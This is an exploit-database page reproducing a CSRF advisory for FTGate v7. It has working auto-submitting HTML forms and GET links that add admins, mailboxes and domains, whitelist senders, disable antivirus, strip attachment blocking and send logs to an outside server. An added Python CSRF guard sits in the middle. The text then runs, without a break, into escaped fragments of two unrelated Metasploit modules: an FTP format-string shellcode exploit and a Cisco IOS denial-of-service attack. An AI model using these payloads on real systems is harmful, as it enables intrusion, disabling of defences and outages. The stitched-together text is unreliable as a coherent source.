ID 1337DAY-ID-24346 Type zdt Reporter hyp3rlinx Modified 2015-10-02T00:00:00
Description
Exploit for php platform in category web applications
Vendor:
================================
www.ftgate.com
www.ftgate.com/ftgate-update-7-0-300
Product:
================================
FTGate v7
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Multiple CSRF vectors exist within FTGate v7, allowing the following attacks:
www.ftgate.com/ftgate-update-7-0-300
1) add arbitrary domains
2) enable arbitrary remote archiving of logs
3) whitelist arbitrary email addresses
4) add an arbitrary mailbox and disable antivirus
5) remove email attachment blocking for files
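The common root cause of every vector above is that the admin UI accepts configuration changes from any page that can make the browser send a request, including plain GET links. As an added defender-side example (this is not FTGate code and not the advisory author's), the guard below shows the three checks such an admin interface needs: refuse state changes on GET, compare the Origin or Referer header against the site's own origin, and require a per-session synchroniser token on POST. It also scans constructed access-log lines for GET-based mutations of the kind the advisory lists. The endpoint paths and parameter names come from the advisory; the Request class, the token scheme, the secret, the expected origin and the sample log lines are assumptions made for illustration.

```python
# Added defender-side example; not FTGate code and not from the advisory's author.
# Endpoint paths and parameter names come from the advisory above; the Request class,
# token scheme, secret, expected origin and sample log lines are constructed assumptions.
import hashlib
import hmac
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Admin endpoints the advisory shows changing configuration (constructed grouping).
STATE_CHANGING_PATHS = {
    "/v7/wizards/adddomain.fts", "/v7/wizards/addmailbox.fts",
    "/v7/webadmin/config/archive.fts", "/v7/webadmin/filters/virus.fts",
    "/v7/axml/adminlists.fts", "/v7/axml/whitelist.fts", "/v7/axml/attachments.fts",
}
MUTATING_PARAMS = {"add", "remove", "action"}  # make even a plain GET link mutate data


@dataclass
class Request:
    method: str
    url: str
    headers: dict
    form: dict = field(default_factory=dict)
    session_id: str = ""


def is_state_changing(method, url):
    """True when the request would modify configuration, whatever its verb."""
    parts = urlsplit(url)
    if parts.path not in STATE_CHANGING_PATHS:
        return False
    if method.upper() == "POST":
        return True
    return bool(MUTATING_PARAMS & set(parse_qs(parts.query)))


class CsrfGuard:
    """Origin check plus a per-session synchroniser token (assumed design)."""

    def __init__(self, expected_origin, secret):
        self.expected_origin = expected_origin  # e.g. "http://localhost:8089"
        self.secret = secret  # server-side key, never sent to clients

    def token_for(self, session_id):
        # Bound to the session so a token cannot be replayed across logins.
        return hmac.new(self.secret, session_id.encode(), hashlib.sha256).hexdigest()

    def check(self, req):
        """Return (allowed, reason); read-only requests always pass."""
        if not is_state_changing(req.method, req.url):
            return True, "read-only"
        if req.method.upper() != "POST":
            return False, "state change via GET"  # e.g. whitelist.fts?add=... as a link
        origin = req.headers.get("Origin") or req.headers.get("Referer")
        if not origin:
            return False, "missing Origin/Referer"
        o = urlsplit(origin)
        if f"{o.scheme}://{o.netloc}" != self.expected_origin:
            return False, f"cross-origin request from {o.scheme}://{o.netloc}"
        supplied = req.form.get("csrf_token", "").encode()
        if not hmac.compare_digest(supplied, self.token_for(req.session_id).encode()):
            return False, "missing or invalid csrf_token"
        return True, "ok"


# Combined-log-format fields needed to review existing access logs (constructed parser).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" \d+ \d+ "(?P<referer>[^"]*)"')

# Constructed sample log lines modelled on the advisory's GET links.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2015:12:00:00 +0000] "GET /v7/axml/attachments.fts?id=531&remove=7,10,3 HTTP/1.1" 200 512 "http://attacker.invalid/lure.html"',
    '10.0.0.5 - - [01/Oct/2015:12:00:01 +0000] "GET /v7/axml/attachments.fts?id=531 HTTP/1.1" 200 2048 "http://localhost:8089/v7/webadmin/"',
    '10.0.0.7 - - [01/Oct/2015:12:00:02 +0000] "GET /v7/axml/adminlists.fts?table=admin&add=ghostofsin HTTP/1.1" 200 128 "-"',
]


def find_get_mutations(log_lines, expected_host):
    """Return (url, referer, off_site) for logged GET requests that change state."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and m["method"] == "GET" and is_state_changing("GET", m["url"]):
            off_site = urlsplit(m["referer"]).netloc != expected_host
            hits.append((m["url"], m["referer"], off_site))
    return hits


def demo():
    """Run the guard over constructed requests shaped like the advisory's PoC."""
    guard = CsrfGuard("http://localhost:8089", secret=b"constructed-secret")
    sid = "sess-123"
    add_domain = "http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
    reqs = {
        "attacker_form_post": Request("POST", add_domain, {"Origin": "http://attacker.invalid"},
                                      {"name": "abysmalgodz", "type": "1"}, sid),
        "attacker_get_link": Request("GET", "http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666",
                                     {"Referer": "http://attacker.invalid/lure.html"}, {}, sid),
        "legitimate_post": Request("POST", add_domain, {"Origin": "http://localhost:8089"},
                                   {"name": "example.test", "type": "1", "csrf_token": guard.token_for(sid)}, sid),
        "read_only_get": Request("GET", "http://localhost:8089/v7/axml/attachments.fts?id=531", {}, {}, sid),
    }
    return {name: guard.check(r) for name, r in reqs.items()}
```

Calling demo() rejects the cross-origin form post and the GET link while passing the same-origin POST that carries a valid token and the read-only listing; find_get_mutations(SAMPLE_LOG, "localhost:8089") flags the two logged GETs that carry add/remove parameters, one with an off-site referer and one with none. The GET-refusal check alone would have closed every axml/*.fts vector in the advisory, because a link or image tag can only issue GET requests.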
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary remote domain:
<form id='HELL' action="
http://localhost:8089/v7/wizards/adddomain.fts?action=save&id="
method="post">
<input type="text" name="name" value="abysmalgodz" />
<input type="text" name="type" value="1" />
</form>
2) enable arbitrary remote archive:
<form id='HELL' action="
http://localhost:8089/v7/webadmin/config/archive.fts?action=save"
method="post">
<input type="text" name="action" value="save" />
<input type="text" name="enable" value="on" />
<input type="text" name="duration" value="0" />
<input type="text" name="external" value="on" />
<input type="text" name="extarcserver" value="0.6.6.6" />
</form>
disable antivirus for .exe files: this also has a persistent XSS injection, but our
payload gets truncated at 5 characters; it can still corrupt the loading of the valid XML
returned from the database to the web UI.
e.g.
The HTTP response after the attack outputs corrupted XML, generating errors:
<cell>exe</cell>
<cell/>
<cell><scri</cell>
<cell/>
</row>
<row id='id_"/><s'>
http://localhost:8089/v7/axml/adminlists.fts?table=ext&add=exe
<form id='HELL' action="
http://localhost:8089/v7/webadmin/filters/virus.fts?action=save&mailbox="
method="post">
<input type="text" name="mode" value="on" />
<input type="text" name="selftest" value="0ff" />
<input type="text" name="extGrid_id_exe_0" value="1" />
</form>
add arbitrary admins:
http://localhost:8089/v7/axml/adminlists.fts?table=admin&add=ghostofsin
whitelist arbitrary email addresses:
Messages that originate from these email addresses are not filtered by the
Word or Phrase filters.
http://localhost:8089/v7/axml/whitelist.fts?id=531&add=hell@abyss.666
<!--remove email attachment blocking for exe, hta & html filez -->
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
When accessing the above URL, it returns XML listing all file extensions blocked
on incoming email, so we now know the IDs in the database.
So to remove blocking of .cmd we select '11':
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=11
or remove blocking of multiple file types in one shot:
http://localhost:8089/v7/axml/attachments.fts?id=531&remove=7,10,3
add arbitrary mailbox:
<form id='HELL' action="
http://localhost:8089/v7/wizards/addmailbox.fts?action=save&id=500"
method="post">
<input type="text" name="name" value="punksnotdead" />
<input type="text" name="type" value="0" />
<input type="text" name="cn" value="punksnotdead" />
<input type="text" name="password" value="punksnotdead" />
</form>
</body>
</html>
Disclosure Timeline:
========================================
Vendor Notification: September 29, 2015
Public Disclosure: October 1, 2015
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] FTGate v7
Vulnerable Parameter(s): [+] type, id, mode, add, extarcserver
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
# 0day.today [2018-04-02] #
# debugging -> don't try it!\n return if mytarget.name == \"Debug\"\n\n #print_status(\"ATTACH!\")\n #select(nil,nil,nil,5)\n\n fmtstr_detect_caps\n\n # compute the stack return address using the fmt to leak memory\n addr_pops = mytarget['AddrPops']\n offset = mytarget['Offset']\n if addr_pops > 0\n stackaddr = fmtstr_stack_read(addr_pops)\n print_status(\"Read %#x from offset %d\" % [stackaddr, addr_pops])\n ret = stackaddr + offset\n end\n\n print_status(\"Writing shellcode to: %#x\" % sc_loc)\n print_status(\"Hijacking control via %#x\" % ret)\n\n\n # no extra bytes before the padding..\n num_start = 0\n\n # write shellcode to 'writable'\n arr = fmtstr_gen_array_from_buf(sc_loc, payload.encoded, mytarget)\n\n # process it in groups of 24 (max ~400 bytes per command)\n sc_num = 1\n while arr.length > 0\n print_status(\"Sending part #{sc_num} of the payload...\")\n sc_num += 1\n\n narr = arr.slice!(0..24)\n\n fmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))\n if res[0,4] == \"500 \"\n fail_with(Failure::Unknown, \"Something went wrong when uploading the payload...\")\n end\n end\n end\n\n\n # write 'writable' addr to flowhook (execute shellcode)\n # NOTE: the resulting two writes must be done at the same time\n print_status(\"Attempting to write %#x to %#x..\" % [sc_loc, ret])\n\n fmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)\n # a space allows the next part to start with a '/'\n fmtbuf[num_pad-1,1] = \" \"\n fmtbuf.gsub!(/\\xff/, \"\\xff\\xff\")\n # don't wait for the response here :)\n res = send_cmd(['SITE', 'EXEC', fmtbuf], false)\n\n print_status(\"Your payload should have executed now...\")\n handler\n end\n\n\n #\n # these two functions are used to read stack memory\n # (used by fmtstr_stack_read()\n #\n def trigger_fmt(fmtstr)\n return nil if 
fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))\n send_cmd(['SITE', 'EXEC', 'x', fmtstr], true)\n end\n\n def extract_fmt_output(res)\n if (res =~ /^5.. /)\n #throw \"Crap! Something went wrong while dumping the stack...\"\n return nil\n end\n ret = res.strip.split(/\\r?\\n/)[0]\n ret = ret[6,ret.length]\n return ret\n end\n\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ftp/wuftpd_site_exec_format.rb"}, {"lastseen": "2019-12-14T08:05:04", "bulletinFamily": "exploit", "description": "This module triggers a Denial of Service condition in the Cisco IOS HTTP server. By sending a GET request for \"/%%\", the device becomes unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.2(18)P.\n", "modified": "2017-11-08T16:00:24", "published": "2007-09-24T14:05:37", "id": "MSF:AUXILIARY/DOS/CISCO/IOS_HTTP_PERCENTPERCENT", "href": "", "type": "metasploit", "title": "Cisco IOS HTTP GET /%% Request Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco IOS HTTP GET /%% Request Denial of Service',\n 'Description' => %q{\n This module triggers a Denial of Service condition in the Cisco IOS\n HTTP server. By sending a GET request for \"/%%\", the device becomes\n unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. 
This module\n tested successfully against a Cisco 1600 Router IOS v11.2(18)P.\n },\n 'Author' \t\t=> [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'BID', '1154'],\n [ 'CVE', '2000-0380'],\n [ 'OSVDB', '1302' ],\n ],\n 'DisclosureDate' => 'Apr 26 2000'))\n\n register_options(\n [\n Opt::RPORT(80),\n ])\n\n end\n\n def run\n connect\n\n print_status(\"Sending HTTP DoS packet\")\n\n sploit = \"GET /%% HTTP/1.0\"\n sock.put(sploit + \"\\r\\n\")\n\n disconnect\n end\nend\n\n=begin\n\nPatrick Webster 20070915 Cisco 1600 Router IOS v11.2(18)P\n\nIOS info:\n IOS (tm) 1600 Software (C1600-Y-L), Version 11.2(18)P, RELEASE SOFTWARE (fc1)\n Copyright (c) 1986-1999 by cisco Systems, Inc.\n Compiled Mon 12-Apr-99 14:53 by ashah\n\nExample crash:\n\n %Software-forced reload\n Preparing to dump core...\n Router>\n *Mar 1 00:03:06.349: %SYS-2-WATCHDOG: Process aborted on watchdog timeout, Process = HTTP Server\n -Traceback= 80EE1BC 80F0EC0 80EC004 81C0832 81C0B2E 81C0C76 81C0D68 81C0E4E\n Queued messages:\n *** EXCEPTION ***\n software forced crash\n program counter = 0x80eaca6\n status register = 0x2700\n vbr at time of exception = 0x4000000\n\n=end\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/cisco/ios_http_percentpercent.rb"}]}